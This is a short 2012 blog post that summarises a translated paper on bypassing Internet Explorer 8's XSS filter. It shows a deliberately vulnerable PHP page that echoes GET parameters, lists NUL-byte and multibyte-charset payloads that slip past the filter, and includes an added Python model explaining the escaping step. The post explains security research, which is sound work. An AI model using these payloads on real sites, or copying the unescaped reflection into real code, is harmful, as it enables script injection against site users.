Bypassing IE 8's Client-Side Cross-Site Script (XSS) Filters
Written by Angelo Castigliola   
Oct 19, 2012 at 04:34 PM

An interesting paper by the Chinese hacker Pujun Li, translated by Insight-labs, on bypassing IE 8's client-side Cross-Site Scripting (XSS) filters:

Basically, the web container performs a conversion process on some special characters; if developers misunderstand this conversion process, the IE XSS Filter may be bypassed.

In PHP, if the website has magic_quotes_gpc = On in php.ini then, as we know, ' (single quote), " (double quote), \ (backslash) and NULL characters are escaped with a backslash (%00 => \0).

From my pentesting of IE XSS Filter bypasses, I feel that the IE developers were not interested in how the IE XSS Filter treats NULL characters and the backslash (\) escape character; I mean they do not deeply understand the conversion process.

1. xss.php demo source code:

<!-- x is reflected straight into the HTML body -->
<?php echo $_GET['x']?>
<script type="text/javascript">
// z is reflected inside a JavaScript string literal
var x="<?php echo $_GET['z']?>"
</script>

2. HTML bypass case:

<script>alert(1)</script> :(

%00%00v%00%00<script>alert(1)</script> :(

<script/%00%00v%00%00>alert(1)</script> :D

1. The bypass characters must appear within what the IE XSS Filter's intercept rules match; for example, the rule that intercepts <script> also intercepts <script [here]>.


3. JavaScript bypass case:

%c0";alert(%00)// :)

%c0";//(%0dalert(1)// :(

1. A multi-byte (charset) problem is needed to swallow the backslash (\).

2. //(%000000%0d is used to bypass the function intercept rules.
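To make the conversion step concrete for both the HTML and the JavaScript case above, here is an added Python model; it is not code from the paper, from Insight-labs or from IE. It assumes that magic_quotes_gpc=On behaves like PHP's addslashes() on every GET parameter, rebuilds the output of the paper's xss.php, and applies a deliberately simplified stand-in for IE8's filter (a signature regex must match the request, and the matched text is neutered only if it reappears verbatim in the response; the regex used is illustrative, not IE8's real rule set). For the multi-byte point it assumes the page is decoded as GBK versus UTF-8: after escaping, %c0" becomes the bytes C0 5C 22, and a GBK decoder consumes C0 5C as one character, leaving the quote unescaped.

```python
"""
Added example (not from the paper): model the server-side conversion that the
bypass depends on and check the paper's payloads against a simplified filter.

Assumptions, labelled here and in comments:
  * PHP magic_quotes_gpc=On behaves like addslashes() on every GET parameter.
  * IE8's filter is modelled as "regex matches the request, and the matched
    text is neutered only if it reappears verbatim in the response". The
    regex below is an illustrative stand-in, not IE8's real signature set.
  * The JS breakout is checked for a page decoded as GBK versus UTF-8.
"""
import re
from urllib.parse import unquote_to_bytes


def magic_quotes_gpc(raw: bytes) -> bytes:
    """Replicate PHP addslashes(): ' " and backslash gain a backslash, NUL becomes the two bytes \\0."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):        # ' " and backslash
            out += b"\\" + bytes([b])
        elif b == 0x00:                    # NUL -> backslash + digit zero
            out += b"\\0"
        else:
            out.append(b)
    return bytes(out)


def xss_php_response(x_param: bytes, z_param: bytes) -> bytes:
    """What the paper's xss.php emits for ?x=..&z=.. with magic_quotes_gpc=On."""
    return (b'%s\n<script type="text/javascript">\nvar x="%s"\n</script>\n'
            % (magic_quotes_gpc(x_param), magic_quotes_gpc(z_param)))


# Illustrative stand-in for IE8's "<script ...>" intercept rule (assumption).
SCRIPT_SIG = re.compile(rb"<script[^>]*>", re.IGNORECASE)


def filter_neuters(sig: "re.Pattern[bytes]", request_value: bytes, response: bytes) -> bool:
    """Simplified IE8 model: fire only if the request match is reflected unchanged."""
    m = sig.search(request_value)
    return m is not None and m.group(0) in response


def html_case_neutered(url_encoded_x: bytes) -> bool:
    """Run one of the paper's HTML payloads (as it appears in the URL) through the model."""
    x = unquote_to_bytes(url_encoded_x)           # the browser sees the decoded bytes, NULs included
    return filter_neuters(SCRIPT_SIG, x, xss_php_response(x, b""))


def escaping_backslash_survives(z_param: bytes, charset: str) -> bool:
    """After magic quotes, does the injected quote still carry its backslash once decoded in `charset`?"""
    escaped = magic_quotes_gpc(z_param).decode(charset, errors="replace")
    return '\\"' in escaped


if __name__ == "__main__":
    # The three HTML payloads from the paper, as they appear in the URL.
    for payload in (b"<script>alert(1)</script>",
                    b"%00%00v%00%00<script>alert(1)</script>",
                    b"<script/%00%00v%00%00>alert(1)</script>"):
        print(payload.decode(), "-> neutered" if html_case_neutered(payload) else "-> passes")
    # Constructed JS breakout: lead byte C0, then the quote that magic quotes will escape.
    breakout = b'\xc0";alert(1)//'
    for cs in ("gbk", "utf-8"):
        print(cs, "backslash survives:", escaping_backslash_survives(breakout, cs))
```

In this model the first two HTML payloads are caught because `<script>` is reflected byte-for-byte, while `<script/%00%00v%00%00>` escapes because the request contains raw NULs and the response contains the two printable bytes `\0` in their place, so the matched text is never found; that is the paper's point that the converted characters must fall inside what the rule matches. The last check shows the same escaping backslash vanishing when the bytes are read as GBK but surviving under UTF-8.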

Feel free to contact me at @jackmasa

User Comments

Comment by Kaylan on 2012-11-23 13:18:44
If you wrote an article about life we'd all reach enlightenment.

Last Updated ( Oct 21, 2012 at 06:41 AM )